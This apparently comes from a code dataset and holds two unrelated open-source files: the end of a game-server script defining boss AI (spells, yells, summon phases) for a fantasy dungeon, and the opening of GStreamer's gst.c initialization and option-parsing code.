spells[2].info = sSpellStore.LookupEntry(BLINK);
spells[2].targettype = TARGET_ATTACKING; // SELF?
spells[2].instant = true;
spells[2].perctrigger = 5.0f;
spells[2].attackstoptimer = 1000;
spells[3].info = sSpellStore.LookupEntry(POLYMORPH);
spells[3].targettype = TARGET_ATTACKING;
spells[3].instant = false;
spells[3].perctrigger = 7.0f;
spells[3].attackstoptimer = 1000;
spells[4].info = sSpellStore.LookupEntry(MANA_SHIELD);
spells[4].targettype = TARGET_SELF;
spells[4].instant = true;
spells[4].perctrigger = 6.0f;
spells[4].attackstoptimer = 1000;
}
void OnCombatStart(Unit* mTarget)
{
int RandomSpeach;
sRand.randInt(1000);
RandomSpeach=rand()%3;
switch (RandomSpeach)
{
case 0:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "You make war on Ikiss!"); // needs corrections
_unit->PlaySoundToSet(10554);
break;
case 1:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Ikiss caught you pretty... sliced you, yes!"); // corrections needed!
_unit->PlaySoundToSet(10555);
break;
case 2:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "No escape for... for you!");
_unit->PlaySoundToSet(10556);
break;
}
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnTargetDied(Unit* mTarget) // left to keep it easy to add needed data.
{
if (_unit->GetHealthPct() > 0) // Hack to prevent double yelling (OnDied and OnTargetDied when creature is dying)
{
int RandomSpeach;
sRand.randInt(1000);
RandomSpeach=rand()%2;
switch (RandomSpeach)
{
case 0:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "You'll die! Stay away from trinkets!"); // needs corrections
_unit->PlaySoundToSet(10558);
break;
case 1:
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "<strange_noises>"); // corrections needed!
_unit->PlaySoundToSet(10559);
break;
}
}
}
void OnCombatStop(Unit *mTarget)
{
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, "Ikiss will not... die!");
_unit->PlaySoundToSet(10560);
RemoveAIUpdateEvent();
}
void AIUpdate()
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
if (spells[i].speech != "")
{
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, spells[i].speech.c_str());
_unit->PlaySoundToSet(spells[i].soundid);
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
int nrspells;
};
// AnzuAI
#define CN_ANZU 23035 // that should be real id, but it is not existing in my DB
#define SUMMON_RAVEN_GOD 40098 // event just to test it!
#define SPELL_BOMB 40303
#define CYCLONE_OF_FEATHERS 40321
#define PARALYZING_SCREECH 40184
#define CHARGE_ANZU 40602 // no idea, can be: 40602, 39574 and others
#define BANISH 40370 // can be: 38791, 38009, 40370, 39674, 35182, 40825 // should banish for one minute
//#define SPAWN_BIRDS Can't find for now =/
class ANZUAI : public CreatureAIScript
{
public:
ADD_CREATURE_FACTORY_FUNCTION(ANZUAI);
SP_AI_Spell spells[6];
bool m_spellcheck[6];
ANZUAI(Creature* pCreature) : CreatureAIScript(pCreature)
{
SUMMON_LIMITER = 1;
nrspells = 6;
for(int i=0;i<nrspells;i++)
{
m_spellcheck[i] = false;
}
spells[0].info = sSpellStore.LookupEntry(SPELL_BOMB);
spells[0].targettype = TARGET_ATTACKING;
spells[0].instant = true;
spells[0].perctrigger = 10.0f;
spells[0].attackstoptimer = 1000;
spells[1].info = sSpellStore.LookupEntry(CYCLONE_OF_FEATHERS);
spells[1].targettype = TARGET_ATTACKING;
spells[1].instant = false;
spells[1].perctrigger = 10.0f;
spells[1].attackstoptimer = 1000;
spells[2].info = sSpellStore.LookupEntry(PARALYZING_SCREECH);
spells[2].targettype = TARGET_VARIOUS;
spells[2].instant = false;
spells[2].perctrigger = 10.0f;
spells[2].attackstoptimer = 1000;
spells[3].info = sSpellStore.LookupEntry(CHARGE_ANZU);
spells[3].targettype = TARGET_ATTACKING;
spells[3].instant = true;
spells[3].perctrigger = 5.0f;
spells[3].attackstoptimer = 1000;
spells[4].info = sSpellStore.LookupEntry(BANISH);
spells[4].targettype = TARGET_SELF;
spells[4].instant = true;
spells[4].perctrigger = 0.0f;
spells[4].attackstoptimer = 1000;
spells[5].info = sSpellStore.LookupEntry(SUMMON_RAVEN_GOD);
spells[5].targettype = TARGET_SELF;
spells[5].instant = true;
spells[5].perctrigger = 0.0f;
spells[5].attackstoptimer = 1000;
/*
spells[6].info = sSpellStore.LookupEntry(SUMMON_BIRDS);
spells[6].targettype = TARGET_SELF;
spells[6].instant = true;
spells[6].perctrigger = 0.0f;
spells[6].attackstoptimer = 1000;
*/
}
void OnCombatStart(Unit* mTarget)
{
_unit->CastSpell(_unit, spells[5].info, spells[5].targettype);
SUMMON_LIMITER = 1;
RegisterAIUpdateEvent(_unit->GetUInt32Value(UNIT_FIELD_BASEATTACKTIME));
}
void OnTargetDied(Unit* mTarget) // left to keep it easy to add needed data.
{
}
void OnCombatStop(Unit *mTarget)
{
SUMMON_LIMITER = 1;
_unit->GetAIInterface()->setCurrentAgent(AGENT_NULL);
_unit->GetAIInterface()->SetAIState(STATE_IDLE);
RemoveAIUpdateEvent();
}
void OnDied(Unit * mKiller)
{
SUMMON_LIMITER = 1;
RemoveAIUpdateEvent();
}
void AIUpdate()
{
if((_unit->GetHealthPct() <= 66 && SUMMON_LIMITER == 1) || (_unit->GetHealthPct() <= 33 && SUMMON_LIMITER == 2) )
{
SummonPhase();
}
else
{
float val = sRand.rand(100.0f);
SpellCast(val);
}
}
void SummonPhase()
{
SUMMON_LIMITER += 1;
_unit->CastSpell(_unit,spells[4].info, spells[4].targettype);
//_unit->CastSpell(_unit,spells[6].info, spells[6].targettype); Bird summon spell
}
void SpellCast(float val)
{
if(_unit->GetCurrentSpell() == NULL && _unit->GetAIInterface()->GetNextTarget())
{
float comulativeperc = 0;
Unit *target = NULL;
for(int i=0;i<nrspells;i++)
{
if(!spells[i].perctrigger) continue;
if(m_spellcheck[i])
{
target = _unit->GetAIInterface()->GetNextTarget();
switch(spells[i].targettype)
{
case TARGET_SELF:
case TARGET_VARIOUS:
_unit->CastSpell(_unit, spells[i].info, spells[i].instant); break;
case TARGET_ATTACKING:
_unit->CastSpell(target, spells[i].info, spells[i].instant); break;
case TARGET_DESTINATION:
_unit->CastSpellAoF(target->GetPositionX(),target->GetPositionY(),target->GetPositionZ(), spells[i].info, spells[i].instant); break;
}
if (spells[i].speech != "")
{
_unit->SendChatMessage(CHAT_MSG_MONSTER_YELL, LANG_UNIVERSAL, spells[i].speech.c_str());
_unit->PlaySoundToSet(spells[i].soundid);
}
m_spellcheck[i] = false;
return;
}
if(val > comulativeperc && val <= (comulativeperc + spells[i].perctrigger))
{
_unit->setAttackTimer(spells[i].attackstoptimer, false);
m_spellcheck[i] = true;
}
comulativeperc += spells[i].perctrigger;
}
}
}
protected:
Unit *target;
uint32 SUMMON_LIMITER;
int nrspells;
};
void SetupSethekkHalls(ScriptMgr * mgr)
{
mgr->register_creature_script(CN_AVIAN_DARKHAWK, &AVIANDARKHAWKAI::Create);
mgr->register_creature_script(CN_AVIAN_RIPPER, &AVIANRIPPERAI::Create);
mgr->register_creature_script(CN_AVIAN_WARHAWK, &AVIANWARHAWKAI::Create);
mgr->register_creature_script(CN_COBALT_SERPENT, &COBALTSERPENTAI::Create);
mgr->register_creature_script(CN_TIME_LOST_CONTROLLER, &TIMELOSTCONTROLLERAI::Create);
mgr->register_creature_script(CN_TIME_LOST_SCRYER, &TIMELOSTSCRYERAI::Create);
mgr->register_creature_script(CN_TIME_LOST_SHADOWMAGE, &TIMELOSTSHADOWMAGEAI::Create);
mgr->register_creature_script(CN_SETHEKK_GUARD, &SETHEKKGUARDAI::Create);
mgr->register_creature_script(CN_SETHEKK_INITIATE, &SETHEKKINITIATEAI::Create);
mgr->register_creature_script(CN_SETHEKK_ORACLE, &SETHEKKORACLEAI::Create);
mgr->register_creature_script(CN_SETHEKK_PROPHET, &SETHEKKPROPHETAI::Create);
mgr->register_creature_script(CN_SETHEKK_RAVENGUARD, &SETHEKKRAVENGUARDAI::Create);
mgr->register_creature_script(CN_SETHEKK_SHAMAN, &SETHEKKSHAMANAI::Create);
mgr->register_creature_script(CN_SETHEKK_TALON_LORD, &SETHEKKTALONLORDAI::Create);
mgr->register_creature_script(CN_DARKWEAVER_SYTH, &DARKWEAVERSYTHAI::Create);
mgr->register_creature_script(CN_TALON_KING_IKISS, &TALONKINGIKISSAI::Create);
mgr->register_creature_script(CN_ANZU, &ANZUAI::Create);
}
// Can't check Anzu, as I don't have it in DB right now. Add some spells (2?) and
// change other if needed.
| gpl-2.0 |
teamfx/openjfx-10-dev-rt | modules/javafx.media/src/main/native/gstreamer/gstreamer-lite/gstreamer/gst/gst.c | 2 | 41555 | /* GStreamer
* Copyright (C) 1999,2000 Erik Walthinsen <omega@cse.ogi.edu>
* 2000 Wim Taymans <wtay@chello.be>
*
* gst.c: Initialization and non-pipeline operations
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Library General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Library General Public License for more details.
*
* You should have received a copy of the GNU Library General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 51 Franklin St, Fifth Floor,
* Boston, MA 02110-1301, USA.
*/
/**
* SECTION:gst
* @short_description: Media library supporting arbitrary formats and filter
* graphs.
*
* GStreamer is a framework for constructing graphs of various filters
* (termed elements here) that will handle streaming media. Any discreet
* (packetizable) media type is supported, with provisions for automatically
* determining source type. Formatting/framing information is provided with
* a powerful negotiation framework. Plugins are heavily used to provide for
* all elements, allowing one to construct plugins outside of the GST
* library, even released binary-only if license require (please don't).
* GStreamer covers a wide range of use cases including: playback, recording,
* editing, serving streams, voice over ip and video calls.
*
* The <application>GStreamer</application> library should be initialized with
* gst_init() before it can be used. You should pass pointers to the main argc
* and argv variables so that GStreamer can process its own command line
* options, as shown in the following example.
*
* <example>
* <title>Initializing the gstreamer library</title>
* <programlisting language="c">
* int
* main (int argc, char *argv[])
* {
* // initialize the GStreamer library
* gst_init (&argc, &argv);
* ...
* }
* </programlisting>
* </example>
*
* It's allowed to pass two %NULL pointers to gst_init() in case you don't want
* to pass the command line args to GStreamer.
*
* You can also use GOption to initialize your own parameters as shown in
* the next code fragment:
* <example>
* <title>Initializing own parameters when initializing gstreamer</title>
* <programlisting>
* static gboolean stats = FALSE;
* ...
* int
* main (int argc, char *argv[])
* {
* GOptionEntry options[] = {
* {"tags", 't', 0, G_OPTION_ARG_NONE, &tags,
* N_("Output tags (also known as metadata)"), NULL},
* {NULL}
* };
* ctx = g_option_context_new ("[ADDITIONAL ARGUMENTS]");
* g_option_context_add_main_entries (ctx, options, GETTEXT_PACKAGE);
* g_option_context_add_group (ctx, gst_init_get_option_group ());
* if (!g_option_context_parse (ctx, &argc, &argv, &err)) {
* g_print ("Error initializing: %s\n", GST_STR_NULL (err->message));
* exit (1);
* }
* g_option_context_free (ctx);
* ...
* }
* </programlisting>
* </example>
*
* Use gst_version() to query the library version at runtime or use the
* GST_VERSION_* macros to find the version at compile time. Optionally
* gst_version_string() returns a printable string.
*
* The gst_deinit() call is used to clean up all internal resources used
* by <application>GStreamer</application>. It is mostly used in unit tests
* to check for leaks.
*/
#include "gst_private.h"
#include "gstconfig.h"
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#ifdef HAVE_SYS_UTSNAME_H
#include <sys/utsname.h>
#endif
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef G_OS_WIN32
#define WIN32_LEAN_AND_MEAN /* prevents from including too many things */
#include <windows.h> /* GetStdHandle, windows console */
#endif
#if defined(GSTREAMER_LITE)
#include "gstplugins-lite.h"
#endif // GSTREAMER_LITE
#include "gst-i18n-lib.h"
#include <locale.h> /* for LC_ALL */
#include "gst.h"
#include "gsttrace.h"
#define GST_CAT_DEFAULT GST_CAT_GST_INIT
#define MAX_PATH_SPLIT 16
#define GST_PLUGIN_SEPARATOR ","
static gboolean gst_initialized = FALSE;
static gboolean gst_deinitialized = FALSE;
#ifdef G_OS_WIN32
HMODULE _priv_gst_dll_handle = NULL;
#endif
#ifndef GST_DISABLE_REGISTRY
GList *_priv_gst_plugin_paths = NULL; /* for delayed processing in post_init */
extern gboolean _priv_gst_disable_registry_update;
#endif
#ifndef GST_DISABLE_GST_DEBUG
const gchar *priv_gst_dump_dot_dir;
#endif
/* defaults */
/* set to TRUE when segfaults need to be left as is */
static gboolean _gst_disable_segtrap = FALSE;
static gboolean init_pre (GOptionContext * context, GOptionGroup * group,
gpointer data, GError ** error);
static gboolean init_post (GOptionContext * context, GOptionGroup * group,
gpointer data, GError ** error);
#ifndef GST_DISABLE_OPTION_PARSING
static gboolean parse_goption_arg (const gchar * s_opt,
const gchar * arg, gpointer data, GError ** err);
#endif
GSList *_priv_gst_preload_plugins = NULL;
const gchar g_log_domain_gstreamer[] = "GStreamer";
static void
debug_log_handler (const gchar * log_domain,
GLogLevelFlags log_level, const gchar * message, gpointer user_data)
{
g_log_default_handler (log_domain, log_level, message, user_data);
/* FIXME: do we still need this ? fatal errors these days are all
* other than core errors */
/* g_on_error_query (NULL); */
}
enum
{
ARG_VERSION = 1,
ARG_FATAL_WARNINGS,
#ifndef GST_DISABLE_GST_DEBUG
ARG_DEBUG_LEVEL,
ARG_DEBUG,
ARG_DEBUG_DISABLE,
ARG_DEBUG_NO_COLOR,
ARG_DEBUG_COLOR_MODE,
ARG_DEBUG_HELP,
#endif
ARG_PLUGIN_SPEW,
ARG_PLUGIN_PATH,
ARG_PLUGIN_LOAD,
ARG_SEGTRAP_DISABLE,
ARG_REGISTRY_UPDATE_DISABLE,
ARG_REGISTRY_FORK_DISABLE
};
/* debug-spec ::= category-spec [, category-spec]*
* category-spec ::= category:val | val
* category ::= [^:]+
* val ::= [0-5]
*/
#ifndef GSTREAMER_LITE
#ifdef G_OS_WIN32
BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
BOOL WINAPI
DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
if (fdwReason == DLL_PROCESS_ATTACH)
_priv_gst_dll_handle = (HMODULE) hinstDLL;
return TRUE;
}
#endif
#endif // GSTREAMER_LITE
/**
* gst_init_get_option_group: (skip)
*
* Returns a #GOptionGroup with GStreamer's argument specifications. The
* group is set up to use standard GOption callbacks, so when using this
* group in combination with GOption parsing methods, all argument parsing
* and initialization is automated.
*
* This function is useful if you want to integrate GStreamer with other
* libraries that use GOption (see g_option_context_add_group() ).
*
* If you use this function, you should make sure you initialise the GLib
* threading system as one of the very first things in your program
* (see the example at the beginning of this section).
*
* Returns: (transfer full): a pointer to GStreamer's option group.
*/
GOptionGroup *
gst_init_get_option_group (void)
{
#ifndef GST_DISABLE_OPTION_PARSING
GOptionGroup *group;
static const GOptionEntry gst_args[] = {
{"gst-version", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Print the GStreamer version"), NULL},
{"gst-fatal-warnings", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Make all warnings fatal"), NULL},
#ifndef GST_DISABLE_GST_DEBUG
{"gst-debug-help", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Print available debug categories and exit"),
NULL},
{"gst-debug-level", 0, 0, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Default debug level from 1 (only error) to 9 (anything) or "
"0 for no output"),
N_("LEVEL")},
{"gst-debug", 0, 0, G_OPTION_ARG_CALLBACK, (gpointer) parse_goption_arg,
N_("Comma-separated list of category_name:level pairs to set "
"specific levels for the individual categories. Example: "
"GST_AUTOPLUG:5,GST_ELEMENT_*:3"),
N_("LIST")},
{"gst-debug-no-color", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Disable colored debugging output"),
NULL},
{"gst-debug-color-mode", 0, 0, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Changes coloring mode of the debug log. "
"Possible modes: off, on, disable, auto, unix"),
NULL},
{"gst-debug-disable", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg, N_("Disable debugging"), NULL},
#endif
{"gst-plugin-spew", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Enable verbose plugin loading diagnostics"),
NULL},
{"gst-plugin-path", 0, 0, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Colon-separated paths containing plugins"), N_("PATHS")},
{"gst-plugin-load", 0, 0, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Comma-separated list of plugins to preload in addition to the "
"list stored in environment variable GST_PLUGIN_PATH"),
N_("PLUGINS")},
{"gst-disable-segtrap", 0, G_OPTION_FLAG_NO_ARG, G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Disable trapping of segmentation faults during plugin loading"),
NULL},
{"gst-disable-registry-update", 0, G_OPTION_FLAG_NO_ARG,
G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Disable updating the registry"),
NULL},
{"gst-disable-registry-fork", 0, G_OPTION_FLAG_NO_ARG,
G_OPTION_ARG_CALLBACK,
(gpointer) parse_goption_arg,
N_("Disable spawning a helper process while scanning the registry"),
NULL},
{NULL}
};
group = g_option_group_new ("gst", _("GStreamer Options"),
_("Show GStreamer Options"), NULL, NULL);
g_option_group_set_parse_hooks (group, (GOptionParseFunc) init_pre,
(GOptionParseFunc) init_post);
g_option_group_add_entries (group, gst_args);
g_option_group_set_translation_domain (group, GETTEXT_PACKAGE);
return group;
#else
return NULL;
#endif
}
/**
* gst_init_check:
* @argc: (inout) (allow-none): pointer to application's argc
* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
* @err: pointer to a #GError to which a message will be posted on error
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* This function will return %FALSE if GStreamer could not be initialized
* for some reason. If you want your program to fail fatally,
* use gst_init() instead.
*
* Returns: %TRUE if GStreamer could be initialized.
*/
gboolean
gst_init_check (int *argc, char **argv[], GError ** err)
{
#ifndef GST_DISABLE_OPTION_PARSING
GOptionGroup *group;
GOptionContext *ctx;
#endif
gboolean res;
#ifdef GSTREAMER_LITE
#ifdef ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION
#include <crtdbg.h>
_CrtSetDbgFlag ( _CRTDBG_ALLOC_MEM_DF | _CRTDBG_LEAK_CHECK_DF );
_CrtSetReportMode( _CRT_ERROR, _CRTDBG_MODE_DEBUG );
#endif // ENABLE_VISUAL_STUDIO_MEMORY_LEAKS_DETECTION
#endif // GSTREAMER_LITE
if (gst_initialized) {
GST_DEBUG ("already initialized gst");
return TRUE;
}
#ifndef GST_DISABLE_OPTION_PARSING
ctx = g_option_context_new ("- GStreamer initialization");
g_option_context_set_ignore_unknown_options (ctx, TRUE);
g_option_context_set_help_enabled (ctx, FALSE);
group = gst_init_get_option_group ();
g_option_context_add_group (ctx, group);
res = g_option_context_parse (ctx, argc, argv, err);
g_option_context_free (ctx);
#else
init_pre (NULL, NULL, NULL, NULL);
init_post (NULL, NULL, NULL, NULL);
res = TRUE;
#endif
gst_initialized = res;
if (res) {
GST_INFO ("initialized GStreamer successfully");
} else {
GST_INFO ("failed to initialize GStreamer");
}
return res;
}
/**
* gst_init:
* @argc: (inout) (allow-none): pointer to application's argc
* @argv: (inout) (array length=argc) (allow-none): pointer to application's argv
*
* Initializes the GStreamer library, setting up internal path lists,
* registering built-in elements, and loading standard plugins.
*
* Unless the plugin registry is disabled at compile time, the registry will be
* loaded. By default this will also check if the registry cache needs to be
* updated and rescan all plugins if needed. See gst_update_registry() for
* details and section
* <link linkend="gst-running">Running GStreamer Applications</link>
* for how to disable automatic registry updates.
*
* <note><para>
* This function will terminate your program if it was unable to initialize
* GStreamer for some reason. If you want your program to fall back,
* use gst_init_check() instead.
* </para></note>
*
* WARNING: This function does not work in the same way as corresponding
* functions in other glib-style libraries, such as gtk_init\(\). In
* particular, unknown command line options cause this function to
* abort program execution.
*/
void
gst_init (int *argc, char **argv[])
{
GError *err = NULL;
if (!gst_init_check (argc, argv, &err)) {
g_print ("Could not initialize GStreamer: %s\n",
err ? err->message : "unknown error occurred");
if (err) {
g_error_free (err);
}
exit (1);
}
}
/**
* gst_is_initialized:
*
* Use this function to check if GStreamer has been initialized with gst_init()
* or gst_init_check().
*
* Returns: %TRUE if initialization has been done, %FALSE otherwise.
*/
gboolean
gst_is_initialized (void)
{
return gst_initialized;
}
#ifndef GST_DISABLE_REGISTRY
static void
add_path_func (gpointer data, gpointer user_data)
{
GST_INFO ("Adding plugin path: \"%s\", will scan later", (gchar *) data);
_priv_gst_plugin_paths =
g_list_append (_priv_gst_plugin_paths, g_strdup (data));
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
static void
prepare_for_load_plugin_func (gpointer data, gpointer user_data)
{
_priv_gst_preload_plugins =
g_slist_prepend (_priv_gst_preload_plugins, g_strdup (data));
}
#endif
#ifndef GST_DISABLE_OPTION_PARSING
static void
split_and_iterate (const gchar * stringlist, const gchar * separator,
GFunc iterator, gpointer user_data)
{
gchar **strings;
gint j = 0;
gchar *lastlist = g_strdup (stringlist);
while (lastlist) {
strings = g_strsplit (lastlist, separator, MAX_PATH_SPLIT);
g_free (lastlist);
lastlist = NULL;
while (strings[j]) {
iterator (strings[j], user_data);
if (++j == MAX_PATH_SPLIT) {
lastlist = g_strdup (strings[j]);
j = 0;
break;
}
}
g_strfreev (strings);
}
}
#endif
/* we have no fail cases yet, but maybe in the future */
static gboolean
init_pre (GOptionContext * context, GOptionGroup * group, gpointer data,
GError ** error)
{
gchar *libdir;
if (gst_initialized) {
GST_DEBUG ("already initialized");
return TRUE;
}
#if !GLIB_CHECK_VERSION(2, 35, 0)
g_type_init ();
#endif
#if defined(GSTREAMER_LITE) && defined(G_OS_WIN32)
// We still need to call it due too bug in GLib
g_type_init ();
#endif // GSTREAMER_LITE
#ifndef GST_DISABLE_GST_DEBUG
_priv_gst_debug_init ();
priv_gst_dump_dot_dir = g_getenv ("GST_DEBUG_DUMP_DOT_DIR");
#endif
#ifdef ENABLE_NLS
bindtextdomain (GETTEXT_PACKAGE, LOCALEDIR);
bind_textdomain_codeset (GETTEXT_PACKAGE, "UTF-8");
#endif /* ENABLE_NLS */
#ifndef GSTREAMER_LITE
/* This is the earliest we can make stuff show up in the logs.
* So give some useful info about GStreamer here */
#ifdef G_OS_WIN32
{
gchar *basedir =
g_win32_get_package_installation_directory_of_module
(_priv_gst_dll_handle);
libdir = g_build_filename (basedir,
#ifdef _DEBUG
"debug"
#endif
"lib", NULL);
g_free (basedir);
}
#else
libdir = g_strdup (LIBDIR);
#endif
GST_INFO ("Initializing GStreamer Core Library version %s", VERSION);
GST_INFO ("Using library installed in %s", libdir);
g_free (libdir);
#endif // GSTREAMER_LITE
/* Print some basic system details if possible (OS/architecture) */
#ifdef HAVE_SYS_UTSNAME_H
{
struct utsname sys_details;
if (uname (&sys_details) == 0) {
GST_INFO ("%s %s %s %s %s", sys_details.sysname,
sys_details.nodename, sys_details.release, sys_details.version,
sys_details.machine);
}
}
#endif
#ifndef G_ATOMIC_LOCK_FREE
GST_CAT_WARNING (GST_CAT_PERFORMANCE, "GLib atomic operations are NOT "
"implemented using real hardware atomic operations!");
#endif
return TRUE;
}
static gboolean
gst_register_core_elements (GstPlugin * plugin)
{
/* register some standard builtin types */
if (!gst_element_register (plugin, "bin", GST_RANK_PRIMARY,
GST_TYPE_BIN) ||
!gst_element_register (plugin, "pipeline", GST_RANK_PRIMARY,
GST_TYPE_PIPELINE)
)
g_assert_not_reached ();
return TRUE;
}
/*
* this bit handles:
* - initalization of threads if we use them
* - log handler
* - initial output
* - initializes gst_format
* - registers a bunch of types for gst_objects
*
* - we don't have cases yet where this fails, but in the future
* we might and then it's nice to be able to return that
*/
static gboolean
init_post (GOptionContext * context, GOptionGroup * group, gpointer data,
GError ** error)
{
GLogLevelFlags llf;
if (gst_initialized) {
GST_DEBUG ("already initialized");
return TRUE;
}
llf = G_LOG_LEVEL_CRITICAL | G_LOG_LEVEL_ERROR | G_LOG_FLAG_FATAL;
g_log_set_handler (g_log_domain_gstreamer, llf, debug_log_handler, NULL);
#ifndef GST_DISABLE_TRACE
_priv_gst_alloc_trace_initialize ();
#endif
_priv_gst_mini_object_initialize ();
_priv_gst_quarks_initialize ();
_priv_gst_allocator_initialize ();
_priv_gst_memory_initialize ();
_priv_gst_format_initialize ();
_priv_gst_query_initialize ();
_priv_gst_structure_initialize ();
_priv_gst_caps_initialize ();
_priv_gst_caps_features_initialize ();
_priv_gst_meta_initialize ();
_priv_gst_message_initialize ();
g_type_class_ref (gst_object_get_type ());
g_type_class_ref (gst_pad_get_type ());
g_type_class_ref (gst_element_factory_get_type ());
g_type_class_ref (gst_element_get_type ());
g_type_class_ref (gst_type_find_factory_get_type ());
g_type_class_ref (gst_bin_get_type ());
g_type_class_ref (gst_bus_get_type ());
g_type_class_ref (gst_task_get_type ());
g_type_class_ref (gst_clock_get_type ());
g_type_class_ref (gst_debug_color_mode_get_type ());
gst_uri_handler_get_type ();
g_type_class_ref (gst_object_flags_get_type ());
g_type_class_ref (gst_bin_flags_get_type ());
g_type_class_ref (gst_buffer_flags_get_type ());
g_type_class_ref (gst_buffer_copy_flags_get_type ());
g_type_class_ref (gst_bus_flags_get_type ());
g_type_class_ref (gst_bus_sync_reply_get_type ());
g_type_class_ref (gst_caps_flags_get_type ());
g_type_class_ref (gst_clock_return_get_type ());
g_type_class_ref (gst_clock_entry_type_get_type ());
g_type_class_ref (gst_clock_flags_get_type ());
g_type_class_ref (gst_clock_type_get_type ());
g_type_class_ref (gst_debug_graph_details_get_type ());
g_type_class_ref (gst_state_get_type ());
g_type_class_ref (gst_state_change_return_get_type ());
g_type_class_ref (gst_state_change_get_type ());
g_type_class_ref (gst_element_flags_get_type ());
g_type_class_ref (gst_core_error_get_type ());
g_type_class_ref (gst_library_error_get_type ());
g_type_class_ref (gst_resource_error_get_type ());
g_type_class_ref (gst_stream_error_get_type ());
g_type_class_ref (gst_event_type_flags_get_type ());
g_type_class_ref (gst_event_type_get_type ());
g_type_class_ref (gst_seek_type_get_type ());
g_type_class_ref (gst_seek_flags_get_type ());
g_type_class_ref (gst_qos_type_get_type ());
g_type_class_ref (gst_format_get_type ());
g_type_class_ref (gst_debug_level_get_type ());
g_type_class_ref (gst_debug_color_flags_get_type ());
g_type_class_ref (gst_iterator_result_get_type ());
g_type_class_ref (gst_iterator_item_get_type ());
g_type_class_ref (gst_message_type_get_type ());
g_type_class_ref (gst_mini_object_flags_get_type ());
g_type_class_ref (gst_pad_link_return_get_type ());
g_type_class_ref (gst_pad_link_check_get_type ());
g_type_class_ref (gst_flow_return_get_type ());
g_type_class_ref (gst_pad_mode_get_type ());
g_type_class_ref (gst_pad_direction_get_type ());
g_type_class_ref (gst_pad_flags_get_type ());
g_type_class_ref (gst_pad_presence_get_type ());
g_type_class_ref (gst_pad_template_flags_get_type ());
g_type_class_ref (gst_pipeline_flags_get_type ());
g_type_class_ref (gst_plugin_error_get_type ());
g_type_class_ref (gst_plugin_flags_get_type ());
g_type_class_ref (gst_plugin_dependency_flags_get_type ());
g_type_class_ref (gst_rank_get_type ());
g_type_class_ref (gst_query_type_flags_get_type ());
g_type_class_ref (gst_query_type_get_type ());
g_type_class_ref (gst_buffering_mode_get_type ());
g_type_class_ref (gst_stream_status_type_get_type ());
g_type_class_ref (gst_structure_change_type_get_type ());
g_type_class_ref (gst_tag_merge_mode_get_type ());
g_type_class_ref (gst_tag_flag_get_type ());
g_type_class_ref (gst_tag_scope_get_type ());
g_type_class_ref (gst_task_pool_get_type ());
g_type_class_ref (gst_task_state_get_type ());
g_type_class_ref (gst_toc_entry_type_get_type ());
